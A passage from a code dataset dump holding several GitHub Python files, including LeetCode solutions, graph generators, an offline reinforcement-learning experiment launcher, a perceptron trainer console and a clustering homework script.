floatfmt='.2f'))\n\ntitle = \"KN - Metric : manhattan | Weight : my_func | N_neightbors : 9 \"\nclf = neighbors.KNeighborsClassifier(n_neighbors=9, weights=my_func, metric='manhattan')\nclf.fit(X_train, y_train)\nprint(clf.score(X_test, y_test))\nplot(X, X_test, X_train, clf, title)\n","repo_name":"MarkNo1/Machine_Learning","sub_path":"ML_16-17/03-Nearest_Neighbours/code/hw3.py","file_name":"hw3.py","file_ext":"py","file_size_in_byte":6052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"40774679405","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : Rock Wayne \n# @Created : 2020-05-07 08:00:00\n# @Last Modified : 2020-05-07 08:00:00\n# @Mail : lostlorder@gmail.com\n# @Version : alpha-1.0\n\n\"\"\"\n# 实现一个 MyCalendar 类来存放你的日程安排。如果要添加的时间内没有其他安排,则可以存储这个新的日程安排。 \n# \n# MyCalendar 有一个 book(int start, int end)方法。它意味着在 start 到 end 时间内增加一个日程安排,注意,这里\n# 的时间是半开区间,即 [start, end), 实数 x 的范围为, start <= x < end。 \n# \n# 当两个日程安排有一些时间上的交叉时(例如两个日程安排都在同一时间内),就会产生重复预订。 \n# \n# 每次调用 MyCalendar.book方法时,如果可以将日程安排成功添加到日历中而不会导致重复预订,返回 true。否则,返回 false 并且不要将该\n# 日程安排添加到日历中。 \n# \n# 请按照以下步骤调用 MyCalendar 类: MyCalendar cal = new MyCalendar(); MyCalendar.book(st\n# art, end) \n# \n# 示例 1: \n# \n# MyCalendar();\n# MyCalendar.book(10, 20); // returns true\n# MyCalendar.book(15, 25); // returns false\n# MyCalendar.book(20, 30); // returns true\n# 解释: \n# 第一个日程安排可以添加到日历中. 第二个日程安排不能添加到日历中,因为时间 15 已经被第一个日程安排预定了。\n# 第三个日程安排可以添加到日历中,因为第一个日程安排并不包含时间 20 。\n# \n# \n# 说明: \n# \n# \n# 每个测试用例,调用 MyCalendar.book 函数最多不超过 100次。 \n# 调用函数 MyCalendar.book(start, end)时, start 和 end 的取值范围为 [0, 10^9]。 \n# \n# Related Topics 数组\n\n\"\"\"\n\nimport pytest\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\n\nclass BSTNode(object):\n def __init__(self, start, end):\n self.start = start\n self.end = end\n self.left = None\n self.right = None\n\n def insert(self, node):\n if node.start >= self.end:\n if not self.right:\n self.right = node\n return True\n return self.right.insert(node)\n elif node.end <= self.start:\n if not self.left:\n self.left = node\n return True\n return self.left.insert(node)\n else:\n return False\n\n\nclass MyCalendar:\n \"\"\"\n 二叉搜索树\n GOOD\n \"\"\"\n\n def __init__(self):\n self.root = None\n\n def book(self, start: int, end: int) -> bool:\n if self.root is None:\n self.root = BSTNode(start, end)\n return True\n return self.root.insert(BSTNode(start, end))\n\n\n# Your MyCalendar object will be instantiated and called as such:\n# obj = MyCalendar()\n# param_1 = obj.book(start,end)\n# leetcode submit region end(Prohibit modification and deletion)\n\ndef test_design():\n obj = MyCalendar()\n assert obj.book(10, 20) # returns true\n assert obj.book(15, 25) is False # returns false\n assert obj.book(20, 30) # returns true\n\n\nif __name__ == '__main__':\n pytest.main([\"-q\", \"--color=yes\", \"--capture=no\", __file__])\n","repo_name":"Wang-Yann/LeetCodeMe","sub_path":"python/_0501_1000/0729_my-calendar-i.py","file_name":"0729_my-calendar-i.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"71349947012","text":"from Graphs import *\n\nfrom itertools import combinations\nfrom random import choice\nfrom sys import modules\nfrom functools import partial\n\nfrom numpy.random import multinomial, uniform\nfrom numpy import zeros\n\n\ndef ErdosRenyiGraph(n, p=0.05):\n\t\"\"\"Each possible edge is included with probability p.\"\"\"\n\tnodes = range(n)\n\tedges = filter(lambda x: uniform(0,1) < p, combinations(nodes, 2))\n\treturn UndirectedGraph(nodes, edges)\n\n\ndef BarabasiAlbertGraph(n, d):\n\t\"\"\"Preferential atachment graph on n nodes; most nodes have degree >= d.\"\"\"\n\tnodes = range(n)\n\tedges = set()\n\tdegrees = zeros(n)\n\tfor node in nodes:\n\t\tdegrees[node] += 1\n\t\tnew_edges = set()\n\t\twhile degrees[node] <= d and degrees[node] <= node:\n\t\t\tneighbor = list(multinomial(1, degrees / degrees.sum())).index(1)\n\t\t\te = (node, neighbor)\n\t\t\tif e in new_edges:\n\t\t\t\tcontinue\n\t\t\tnew_edges.add(e)\n\t\t\tdegrees[neighbor] += 1\n\t\t\tdegrees[node] += 1\n\t\tedges.update(new_edges)\n\treturn UndirectedGraph(nodes, edges)\n\n\ndef UniformSpanningTree(n):\n\t\"\"\"Uniform spanning tree over the complete graph on n edges.\"\"\"\n\tnew_nodes = range(n)\n\ttree_nodes = set()\n\tedges = set()\n\tfirst_node = new_nodes.pop(choice(new_nodes))\n\ttree_nodes.add(first_node)\n\twhile len(tree_nodes) < n:\n\t\tsrc_node = choice(new_nodes)\n\t\tpath = [src_node]\n\t\twhile src_node in new_nodes:\n\t\t\ttree_nodes.add(src_node)\n\t\t\tnew_nodes.pop(new_nodes.index(src_node))\n\t\t\tdst_node = choice(range(n))\n\t\t\twhile dst_node in path:\n\t\t\t\tdst_node = choice(range(n))\n\t\t\tedges.add(Edge(src_node, dst_node))\n\t\t\tpath.append(dst_node)\n\t\t\tsrc_node = dst_node\n\tGraph.__init__(self, tree_nodes, edges)\n\n\ndef ERGd(n, d):\n\treturn ErdosRenyiGraph(n, float(d)/n)\n\nfor i in range(1,11):\n\tsetattr(modules[__name__], 'ERGd'+str(i), partial(ERGd, d=i))\n\n\ndef BAGd(n, d):\n\treturn BarabasiAlbertGraph(n, (d+1)/2)\n\nfor i in range(2,11):\n\tsetattr(modules[__name__], 'BAGd'+str(i), partial(BAGd, d=i))\n\n\ndef WattsStrogatzGraph(n, k=4, p=0.1):\n\t\"\"\"\n\tLocal connections on a ring lattice with random re-wirings.\n\t\n\tParameters:\n\tk = number of lattice neighbors each node begins with local connections to.\n\tp = probability that each local connection gets re-wired to a new uniformly\n\t\tchosen endpoint.\n\t\"\"\"\n\tnodes = range(n)\n\tlocal_edges = []\n\tfor i in range(1,k/2+1):\n\t\tlocal_edges.extend(zip(nodes, range(i,n) + range(i)))\n\tg = UndirectedGraph(nodes, local_edges)\n\tfor e in local_edges:\n\t\tif uniform() < p:\n\t\t\tg.addEdge(e[0], choice(list(g.nodes - g.edges[e[0]] - {e[0]})))\n\t\t\tg.removeEdge(*e)\n\treturn g\n\n\ndef BalancedBinaryTree(n):\n\treturn UndirectedGraph(range(n), [(i, (i-1)/2) for i in range(1,n)])\n\n\ndef LineGraph(n):\n\treturn UndirectedGraph(range(n), [(i, i+1) for i in range(n-1)])\n\n\ndef RingGraph(n):\n\treturn UndirectedGraph(range(n), [(i, i+1) for i in range(n-1)] + [(n-1,0)])\n\n\ndef EmptyGraph(n):\n\treturn UndirectedGraph(range(n))\n\n\ndef CompleteGraph(n):\n\treturn UndirectedGraph(range(n), combinations(range(n), 2))\n\n\ndef RandomEdgeDirections(graph):\n\tedges = []\n\tfor src, dst in set(map(lambda e: tuple(sorted(e)), graph.allEdges())):\n\t\tif uniform(0,1) < 0.5:\n\t\t\tedges.append((src, dst))\n\t\telse:\n\t\t\tedges.append((dst, src))\n\treturn DirectedGraph(graph.nodes, edges)\n\n\ndef AddWeights(graph):\n\tedges = [(e[0], e[1], 1) for e in graph.allEdges()]\n\treturn WeightedDirectedGraph(graph.nodes, edges)\n\n\n","repo_name":"egtaonline/CredNets","sub_path":"Graphs/GraphGenerators.py","file_name":"GraphGenerators.py","file_ext":"py","file_size_in_byte":3279,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"9611766471","text":"# https://practice.geeksforgeeks.org/viewSol.php?subId=ff3cb0365cc0e5a1c8ec957014bcaa14&pid=700583&user=darsisriguruaakash\n# https://www.youtube.com/watch?v=nKggNAiEpBE\n# https://www.techiedelight.com/check-given-binary-tree-symmetric-structure-not/\nclass Solution:\n # return true/false denoting whether the tree is Symmetric or not\n def symmetric(self,l,r):\n if l is None and r is None:\n return True \n elif l is None or r is None:\n return False\n if l.data != r.data:\n return False\n else:\n ans1 = self.symmetric(l.right,r.left)\n ans2 = self.symmetric(l.left,r.right)\n return ans1 and ans2\n def isSymmetric(self, root):\n # Your Code Here\n \n if root is None:\n return True \n return self.symmetric(root.left,root.right)\n\n#{ \n# Driver Code Starts\n#Initial Template for Python 3\n\n#Contributed by Sudarshan Sharma\nfrom collections import deque\n# Tree Node\nclass Node:\n def __init__(self, val):\n self.right = None\n self.data = val\n self.left = None\n\n# Function to Build Tree \ndef buildTree(s):\n #Corner Case\n if(len(s)==0 or s[0]==\"N\"): \n return None\n \n # Creating list of strings from input \n # string after spliting by space\n ip=list(map(str,s.split()))\n \n # Create the root of the tree\n root=Node(int(ip[0])) \n size=0\n q=deque()\n \n # Push the root to the queue\n q.append(root) \n size=size+1 \n \n # Starting from the second element\n i=1 \n while(size>0 and i<len(ip)):\n # Get and remove the front of the queue\n currNode=q[0]\n q.popleft()\n size=size-1\n \n # Get the current node's value from the string\n currVal=ip[i]\n \n # If the left child is not null\n if(currVal!=\"N\"):\n \n # Create the left child for the current node\n currNode.left=Node(int(currVal))\n \n # Push it to the queue\n q.append(currNode.left)\n size=size+1\n # For the right child\n i=i+1\n if(i>=len(ip)):\n break\n currVal=ip[i]\n \n # If the right child is not null\n if(currVal!=\"N\"):\n \n # Create the right child for the current node\n currNode.right=Node(int(currVal))\n \n # Push it to the queue\n q.append(currNode.right)\n size=size+1\n i=i+1\n return root\n \n \nif __name__==\"__main__\":\n t=int(input())\n for _ in range(0,t):\n s=input()\n root=buildTree(s)\n ob = Solution()\n if ob.isSymmetric(root):\n print(\"True\")\n else:\n print(\"False\")\n \n \n\n# } Driver Code Ends","repo_name":"Aakashdarsi/Algorithms-All-Sets","sub_path":"DSA-Python/Trees/is_symmetric.py","file_name":"is_symmetric.py","file_ext":"py","file_size_in_byte":2914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"24233621843","text":"# https://leetcode.cn/problems/valid-palindrome/\nclass Solution:\n\n def isPalindrome(self, s: str) -> bool:\n if len(s) < 1:\n return True\n # print(s.lower())\n s = s.lower()\n left, right = 0, len(s) - 1\n while left < right:\n while s[left] < '0' or '9' < s[left] < 'a' or s[left] > 'z':\n left += 1\n if left > len(s) - 1:\n return True\n while s[right] < '0' or '9' < s[right] < 'a' or s[right] > 'z':\n right -= 1\n if right < 0:\n return True\n if left >= right:\n break\n if s[left] != s[right]:\n return False\n left += 1\n right -= 1\n return True\n\n\nif __name__ == '__main__':\n a = Solution()\n s = \"race a car\"\n print(a.isPalindrome(s))\n","repo_name":"NIAN-QIAO/2023SPRING","sub_path":"String/Palindromic string/125isPalindrome.py","file_name":"125isPalindrome.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"42874711212","text":"\"\"\"\nAWR + SAC from demo experiment\n\"\"\"\n\n# from multiworld.core.image_env import normalize_image\nfrom numpy.core.fromnumeric import transpose\nfrom torch.nn.functional import normalize\nfrom rlkit.demos.source.hdf5_path_loader import HDF5PathLoader\nfrom rlkit.launchers.experiments.awac.finetune_rl import experiment\n\nfrom rlkit.launchers.launcher_util import run_experiment\n\nfrom rlkit.torch.sac.policies import GaussianPolicy, TanhGaussianPolicy\nfrom rlkit.torch.sac.iql_trainer import IQLTrainer\nfrom rlkit.torch.sac.cql_trainer import CQLTrainer\n\n\nimport random\nimport time\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--exp_name', type=str)\nparser.add_argument('--env_name', type=str, default='halfcheetah-medium-v2')\nparser.add_argument('--algo_type', type=str, default='iql')\nparser.add_argument('--image_rl', action='store_true')\nparser.add_argument('--no_curl_contrastive_learning', action='store_true')\n\nparser.add_argument('--seperate_vf_encoder', action='store_true')\nparser.add_argument('--pretrain_contrastive', action='store_true')\n\nparser.add_argument('--data_mix_type', type=str, default=None)\nparser.add_argument('--data_mix_num_real', type=int, default=None)\nparser.add_argument('--data_mix_num_gen', type=int, default=None)\nparser.add_argument('--add_sac_entropy', action='store_true')\n\nparser.add_argument('--slac_representation', action='store_true')\nparser.add_argument('--freeze_slac', action='store_true')\nparser.add_argument('--slac_latent_model_load_dir', type=str, default='')\nparser.add_argument('--slac_buffer_load_dir', type=str, default=None)\nparser.add_argument('--slac_policy_input_type', type=str, default=None)\nparser.add_argument('--slac_obs_reset_w_same_obs', action='store_true')\n\nparser.add_argument('--uncertainty_penalty_lambda', type=float, default=1.0)\nparser.add_argument('--uncertainty_type', type=str, default=None)\nparser.add_argument('--uncertainty_ablation', action='store_true')\nparser.add_argument('--generalization_test', type=str, default=None)\n\nparser.add_argument('--n_experiments', type=int, default=1)\nparser.add_argument('--gpu_id', type=int, default=0)\nparser.add_argument('--gpu_list', nargs=\"+\", default=[0,1,2])\nparser.add_argument('--seperate_buffer', action='store_true')\nparser.add_argument('--use_advanced_data', action='store_true')\nparser.add_argument('--use_tiny_data', action='store_true')\n\n\nparser.add_argument('--rad_aug', action='store_true')\nparser.add_argument('--rad_aug_type', type=str, default=None)\n\nparser.add_argument('--debug', action='store_true')\n\n\nargs = parser.parse_args()\n\nimage_rl = args.image_rl\n\nfrom_pixels = False\nvisualize_reward = False # prevent green colorizing when render\ndm_control_env_dict = { \n 'cheetah-run-mixed_first_500k' : dict(domain_name='cheetah', task_name='run', frame_skip=4, from_pixels = from_pixels, visualize_reward = visualize_reward), \n \n }\nis_dmc = True if args.env_name in dm_control_env_dict.keys() else False\n\nif args.slac_representation:\n assert args.no_curl_contrastive_learning\nelif args.no_curl_contrastive_learning:\n assert not args.slac_representation\n\nif is_dmc:\n max_path_length = int(1000/(dm_control_env_dict.get(args.env_name).get('frame_skip')))\n\n\nimport os\n\nsave_path = './data' \nslac_latent_model_path = './slac_pytorch/logs'\n\n\ntrainer_class_dict = {'iql' : IQLTrainer, 'cql' : CQLTrainer}\ntrainer_kwargs_dict = {'iql' : dict(discount=0.99,\n policy_lr=1E-4,\n qf_lr=3E-4,\n reward_scale=1,\n soft_target_tau=0.005,\n policy_weight_decay=0,\n q_weight_decay=0,\n reward_transform_kwargs=None,\n terminal_transform_kwargs=None,\n beta=1.0/10, \n quantile=0.7, \n clip_score=100,\n image_rl = args.image_rl, \n policy_update_period=1,\n q_update_period=1,\n curl_update_period =1,\n target_update_period = 2,\n encoder_target_tau = 0.025,\n no_curl_contrastive_learning = args.no_curl_contrastive_learning,\n pretrain_contrastive = args.pretrain_contrastive,\n add_sac_entropy = args.add_sac_entropy,\n training_start_steps = 0, \n # SLAC\n slac_representation = args.slac_representation, \n freeze_slac = args.freeze_slac,\n slac_update_period = 1,\n slac_policy_input_type = args.slac_policy_input_type,\n \n ),\n 'cql' : dict(discount=0.99,\n soft_target_tau=5e-3,\n policy_lr=1E-4,\n qf_lr=3E-4,\n reward_scale=1,\n use_automatic_entropy_tuning=True,\n\n # Target nets/ policy vs Q-function update\n policy_eval_start=40000,\n num_qs=2,\n\n # min Q\n temp=1.0,\n min_q_version=3,\n min_q_weight=5.0,\n\n # lagrange\n with_lagrange=False,\n lagrange_thresh=-1.0,\n \n # extra params\n num_random=10,\n max_q_backup=False,\n deterministic_backup=False,\n \n image_rl = args.image_rl, \n encoder_lr = 1e-3, \n \n curl_update_period = 1,\n encoder_target_tau = 0.05,\n no_curl_contrastive_learning = args.no_curl_contrastive_learning,\n training_start_steps = 0,\n pretrain_contrastive = args.pretrain_contrastive,\n # for SLAC\n slac_representation = args.slac_representation, \n freeze_slac = args.freeze_slac,\n slac_update_period = 1,\n slac_policy_input_type = args.slac_policy_input_type,\n ),\n \n }\ntrainer_class=trainer_class_dict[args.algo_type]\ntrainer_kwargs = trainer_kwargs_dict[args.algo_type]\nif args.slac_representation:\n offline_image_data_path_prefix = save_path+'/trajwise'\n\n\nif not image_rl: \n if is_dmc: \n env_kwargs = dm_control_env_dict.get(args.env_name)\n\n variant = dict(\n algo_kwargs=dict(\n start_epoch=-1000, # offline epochs\n num_epochs=1001, # online epochs\n batch_size=256,\n num_eval_steps_per_epoch=10*max_path_length if not args.debug else 100,\n num_trains_per_train_loop=1000 if not args.debug else 100,\n num_expl_steps_per_train_loop=1000 if not args.debug else 100,\n min_num_steps_before_training=1000 if not args.debug else 100,\n ),\n max_path_length=max_path_length,\n video_eval_max_path_length=max_path_length,\n video_expl_max_path_length=1000,\n replay_buffer_size=int(2E6),\n layer_size=256,\n policy_class=TanhGaussianPolicy,\n policy_kwargs=dict(\n hidden_sizes=[256, 256, ],\n ),\n qf_kwargs=dict(\n hidden_sizes=[256, 256, ],\n ),\n \n algorithm=\"SAC\",\n version=\"normal\",\n collection_mode='batch',\n trainer_class=trainer_class,\n trainer_kwargs=trainer_kwargs,\n \n algo_type = args.algo_type,\n offline_image_data_path_prefix = offline_image_data_path_prefix,\n\n launcher_config=dict(\n num_exps_per_instance=1,\n region='us-west-2',\n ),\n\n path_loader_class=HDF5PathLoader,\n path_loader_kwargs=dict(),\n add_env_demos=False,\n add_env_offpolicy_data=False,\n\n load_demos=False,\n load_env_dataset_demos=True,\n\n normalize_env=False,\n env_id=args.env_name, #'halfcheetah-medium-v2',\n normalize_rewards_by_return_range=True,\n\n seed=random.randint(0, 100000),\n \n is_dmc = is_dmc,\n image_rl = False,\n \n state_rl_100k_debug = False,\n # frame_stack = 3,\n use_tiny_data = args.use_tiny_data,\n save_video = True, #False,\n env_kwargs = env_kwargs,\n \n )\n\nelse: # image rl\n from examples.iql.custom_networks import TanhGaussianPolicyWithEncoder \n '''\n epoch *num_trains_per_train_loop = total gradient steps (you should consider network update period)\n '''\n \n if is_dmc:\n if args.slac_representation:\n env_kwargs = dm_control_env_dict.get(args.env_name)\n env_kwargs.update({'from_pixels' : True, 'width' : 100, 'height' : 100})\n if args.generalization_test:\n if 'walker' in args.env_name:\n env_kwargs.update({'task_name' : 'run'})\n else:\n env_kwargs = dm_control_env_dict.get(args.env_name) \n \n \n \n if (args.algo_type in ['cql', 'bear']) and (not args.slac_representation):\n batch_size = 128\n else:\n batch_size = 128\n\n\n\n variant = dict(\n algo_kwargs=dict(\n start_epoch=-150 if not args.debug else -1, # offline epochs\n num_epochs=151 if not args.debug else 1, # online epochs\n batch_size=batch_size,\n num_eval_steps_per_epoch=10*max_path_length if not args.debug else 125, \n num_trains_per_train_loop=2000 if not args.debug else 10,\n num_expl_steps_per_train_loop=2000 if not args.debug else 125, \n min_num_steps_before_training=1000 if not args.debug else 125,\n num_pretrains = 10000 if args.pretrain_contrastive else 0, \n slac_representation = args.slac_representation,\n rad_aug = args.rad_aug,\n ),\n max_path_length=max_path_length,\n video_eval_max_path_length=max_path_length,\n video_expl_max_path_length=1000,\n replay_buffer_size=int(1E6), # No meaning\n image_replay_buffer_size = int(1E5) if args.data_mix_type is None else int(args.data_mix_num_real+args.data_mix_num_gen), # 100k\n layer_size=256,\n policy_class=TanhGaussianPolicyWithEncoder,\n policy_kwargs=dict(\n hidden_sizes=[1024, 1024, ],\n \n ),\n qf_kwargs=dict(\n hidden_sizes=[1024, 1024, ],\n ),\n vf_kwargs=dict(\n hidden_sizes=[1024, 1024, ],\n ),\n \n algorithm=\"SAC\",\n version=\"normal\",\n collection_mode='batch',\n trainer_class=trainer_class,\n trainer_kwargs=trainer_kwargs,\n launcher_config=dict(\n num_exps_per_instance=1,\n region='us-west-2',\n ),\n\n path_loader_class=HDF5PathLoader,\n path_loader_kwargs=dict(),\n add_env_demos=False,\n add_env_offpolicy_data=False,\n\n load_demos=False,\n load_env_dataset_demos=True,\n\n normalize_env=False,\n env_id=args.env_name,\n normalize_rewards_by_return_range=True if not is_dmc else False,\n\n seed=random.randint(0, 100000),\n \n use_tiny_data = args.use_tiny_data,\n generalization_test = args.generalization_test,\n use_advanced_data = args.use_advanced_data,\n seperate_buffer = args.seperate_buffer,\n uncertainty_penalty_lambda = args.uncertainty_penalty_lambda,\n uncertainty_type = args.uncertainty_type,\n slac_representation = args.slac_representation,\n slac_latent_model_load_dir = slac_latent_model_path + args.slac_latent_model_load_dir,\n slac_buffer_load_dir = args.slac_buffer_load_dir, \n slac_policy_input_type = args.slac_policy_input_type,\n slac_obs_reset_w_same_obs = args.slac_obs_reset_w_same_obs,\n \n \n slac_algo_kwargs = dict(buffer_size = int(1.05e5),\n image_size = 100,\n feature_dim = 256,\n z1_dim = 32,\n z2_dim = 256,\n ),\n # for RAD\n rad_aug = args.rad_aug,\n rad_aug_type = args.rad_aug_type, \n\n algo_type = args.algo_type,\n memory_efficient_way = True,\n \n data_mix_type = args.data_mix_type,\n data_mix_num_real = args.data_mix_num_real,\n data_mix_num_gen = args.data_mix_num_gen,\n seperate_vf_encoder = args.seperate_vf_encoder,\n \n env_kwargs = env_kwargs,\n offline_image_data_path_prefix = offline_image_data_path_prefix,\n frame_stack = 3,\n image_rl = True,\n is_dmc = is_dmc,\n image_obs_shape = (3*3,100,100), # (C*frame stack, H,W)\n \n curl_learning = False if args.slac_representation else True, \n curl_crop_image_size = 84,\n \n save_video = True,\n \n )\n\n\ndef main():\n if is_dmc:\n from xvfbwrapper import Xvfb\n vdisplay = Xvfb()\n vdisplay.start()\n print('xvfb started!')\n\n is_multiprocess = False\n if args.n_experiments > 1:\n print('Currently {} multiprocess is used!'.format(args.n_experiments))\n is_multiprocess = True\n from multiprocessing import Process\n\n if is_multiprocess: \n processes = [] \n for idx, e in enumerate(range(args.n_experiments)): \n gpu_id = args.gpu_list[idx]\n # gpu_id = idx\n print('gpu id : ', gpu_id)\n seed=random.randint(0, 100000)\n variant['seed'] = seed\n def train_func():\n run_experiment(experiment,\n variant=variant,\n exp_prefix= args.algo_type+'-'+ args.env_name+'-' + args.exp_name,\n mode=\"here_no_doodad\",\n unpack_variant=False,\n use_gpu=True, \n gpu_id = gpu_id,\n snapshot_mode = 'all',\n ) \n # Awkward hacky process runs, because Tensorflow does not like\n # repeatedly calling train_AC in the same thread.\n \n p = Process(target=train_func, args=tuple())\n p.start()\n processes.append(p)\n \n # if you comment in the line below, then the loop will block\n # until this process finishes\n # p.join()\n time.sleep(10) # waiting for h5py load time!\n \n for p in processes:\n p.join()\n \n\n else: \n base_log_dir = save_path+'/OfflineRL/state' if not args.image_rl else save_path+'/OfflineRL/image'\n run_experiment(experiment,\n variant=variant,\n exp_prefix= args.algo_type+'-'+ args.env_name+'-' + args.exp_name,\n mode=\"here_no_doodad\",\n unpack_variant=False,\n use_gpu=True, \n gpu_id = args.gpu_id,\n snapshot_mode = 'all',\n \n base_log_dir = base_log_dir,\n )\n if is_dmc:\n vdisplay.stop()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dsshim0125/s2p","sub_path":"examples/iql/mujoco_finetune.py","file_name":"mujoco_finetune.py","file_ext":"py","file_size_in_byte":16588,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"32032088036","text":"from NN.MultiLayerPerceptron import NeuralNet\nfrom NN.MultiLayerPerceptron import ACTIVATION\nimport json\nimport glob\nimport os\nimport numpy as np\n\ndef help(NN):\n print(\"train: Train Multilayer Perceptron with data from DATA/ folder\")\n print(\"init : Initialize Multilayer Perceptron\")\n print(\"reset: Reset Multilayer Perceptron to default values\")\n print(\"load : Load Multilayer Perceptron from file\")\n print(\"save : Save Multilayer Perceptron on file\")\n print(\"help : Shows his message\")\n return NN\n\ndef trainPerceptron(NN):\n dataFiles = []\n for file in glob.iglob(\"DATA/*.json\", recursive=True):\n dataFiles.append(file)\n if len(dataFiles) > 0:\n inputs = []\n outputs = []\n for file in dataFiles:\n with open(file, 'r') as jsonNNSource:\n data = json.load(jsonNNSource)\n if data[\"Dimensionality\"] == NN.inputLayerSize:\n inputs.append(data[\"InputList\"])\n outputs.append([float(data[\"Output\"]) * 0.1])\n else:\n continue\n print(\"\\t>> [Data successfully loaded from DATA/ folder...] ->\", len(outputs),\"files accepted.\")\n iterations = int(input(\"\\t>> #Iterations(LIMIT): \"))\n NN.train(np.array(inputs), np.array(outputs), iterations)\n print(\">> Training finished\")\n else:\n print(\">> ERROR: The folder \\\"DATA/\\\" is empty(no json file found).\")\n return NN\n\ndef initPerceptron(NN):\n arch = []\n nLayers = int(input(\"\\t>> #Layers: \"))\n for layer in range(nLayers):\n neurons = int(input(\"\\t>> #Neurons in layer#\" + str(layer) + \" -> \"))\n arch.append(neurons)\n params = int(input(\"\\t>> #Parameters in First Layer: \"))\n lRatio = float(input(\"\\t>> Learning Ratio: \"))\n activation = input(\"\\t>> Activation function: \")\n if(activation in ACTIVATION):\n NN = NeuralNet(arch, params, activation, lRatio)\n NN.reset()\n else:\n print(\"ERROR: That activation function id is not supported\")\n return NN\n\ndef resetPerceptron(NN):\n NN.reset()\n print(\">> Current M. Perceptron set on default parameters.\")\n return NN\n\ndef loadPerceptron(NN):\n name = input(\"\\t>> Name of M. Perceptron Info(JSON) file: \")\n print(\">> Successful loading\")if NN.loadFromFile(\"SavedPerceptrons/\" + name + \".json\") else print(\">> ERROR: The file doesn\\'t exist.\")\n return NN\n\ndef savePerceptron(NN):\n name = input(\"\\t>> Name of file: \")\n print(\">> File: \", name + \".json\", \"saved on\", \"SavedPerceptrons/\") if NN.saveOnFile(\"SavedPerceptrons/\" + name + \".json\") else print(\">> ERROR: The M. perceptron hasn\\'t been initialized.\")\n return NN\n\nif __name__ == \"__main__\":\n\n neuralNet = NeuralNet([1,2,1], 1, \"tanh\", 0.5)\n\n controlPanel = {\"train\": trainPerceptron,\n \"init\" : initPerceptron,\n \"reset\": resetPerceptron,\n \"load\" : loadPerceptron,\n \"save\" : savePerceptron,\n \"help\" : help}\n os.system('cls')\n closed = False\n while(not closed):\n print(\"<PCSTitle>: {OCR Perceptron [Trainer]}\")\n print(\"-\"*40)\n neuralNet.getStatus()\n print(\"-\"*40)\n key = input(\">> Write a command: \")\n if key == \"exit\":\n print(\"--- PROGRAM FINISHED ---\")\n exit(0)\n elif key in controlPanel:\n neuralNet = controlPanel[key](neuralNet)\n else:\n print(\">> Comando\", key, \"desconocido, intente nuevamente.\")\n os.system('pause')\n os.system('cls')\n\n ","repo_name":"rodRigocaU/Curso-de-IA","sub_path":"Tarea 004 - Perceptron OCR for Digits/App/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"5810449455","text":"#!/usr/bin/env python3\n\ndpoints = [\n (1,3),\n (2,3),\n (3,3),\n (1,2),\n (2,2),\n (3,2),\n (5,2),\n (5,1),\n (6,1)\n]\n\ndef distance(list1, list2):\n _dist = 0\n for a, b in zip(list1, list2):\n _dist += (a - b) ** 2\n return _dist ** (1 / 2)\n\ndef centroid(points):\n _sums = []\n for i,_ in enumerate(points[0]):\n _sum = 0\n for p in points:\n _sum += p[i]\n _sums.append(_sum)\n\n for i,s in enumerate(_sums):\n _sums[i] = s / len(points)\n\n return tuple(_sums)\n\ndef is_core(point, distance_threshold, mincount, points):\n _num = 0\n for p in points:\n if (distance(p, point) <= distance_threshold):\n _num += 1\n return True if _num >= mincount else False\n\ndef is_boundary(point, distance_threshold, cores):\n for c in cores:\n if (distance(c, point) <= distance_threshold):\n return True\n return False\n\nif __name__ == '__main__':\n dist = 1\n count = 3\n\n ugly_cheating = []\n cores = []\n\n print((' ' * 4) + ' '.join(['R{}:'.format(x + 1) for x in range(9)]))\n for i,p in enumerate(dpoints):\n print('R{}: '.format(i + 1) + ' '.join([format(distance(p, x), '.2f') for x in dpoints]))\n\n for p in dpoints:\n if is_core(p, dist, count, dpoints):\n cores.append(p)\n ugly_cheating.append('core')\n else:\n ugly_cheating.append('')\n\n for i,p in enumerate(dpoints):\n if ugly_cheating[i] != 'core':\n if is_boundary(p, dist, cores):\n ugly_cheating[i] = 'boundary'\n else:\n ugly_cheating[i] = 'noise'\n\n print(ugly_cheating)\n","repo_name":"pegurnee/2016-01-667","sub_path":"homework/4_hw/src/9.py","file_name":"9.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"35247240419","text":"import re, logging\nfrom ffe import config\nfrom google.appengine.ext import ndb\nfrom google.appengine.api import memcache\nfrom ffe.markup import XMLElement, XMLDocument, XMLImporter\nfrom ffe.ffe_time import cet_from_string\nfrom ffe.gae import remote_fetch\nfrom ffe.rest_resources import PublicResource, DataType, NoValidIdentifierError\nfrom TSStationPosition import TSStationPosition\nfrom TSStationAgent import TSStationAgent\n\n\nclass TSStation(PublicResource):\n url_name = 'station'\n agent_url = '/agent/station'\n identifier_regex = re.compile('([a-z]{2})\\.([a-z]{1,5})$')\n _positions = None\n\n # datastore properties:\n names = ndb.StringProperty(repeated=True)\n display_index = ndb.IntegerProperty(indexed=False, default=0)\n label_angle = ndb.IntegerProperty(indexed=False)\n importance = ndb.IntegerProperty()\n wiki_string = ndb.StringProperty(indexed=False)\n opened_string = ndb.StringProperty()\n\n # ------------ Object lifecycle ------------------------------------------------------------------------------------\n\n def delete(self):\n for position in self.positions:\n position.delete()\n super(TSStation, self).delete()\n\n # ------------ Object metadata -------------------------------------------------------------------------------------\n\n @property\n def country(self):\n return self.id_part(1)\n\n @property\n def code(self):\n return self.id_part(2)\n\n # ------------ Finding instances -----------------------------------------------------------------------------------\n\n @classmethod\n def 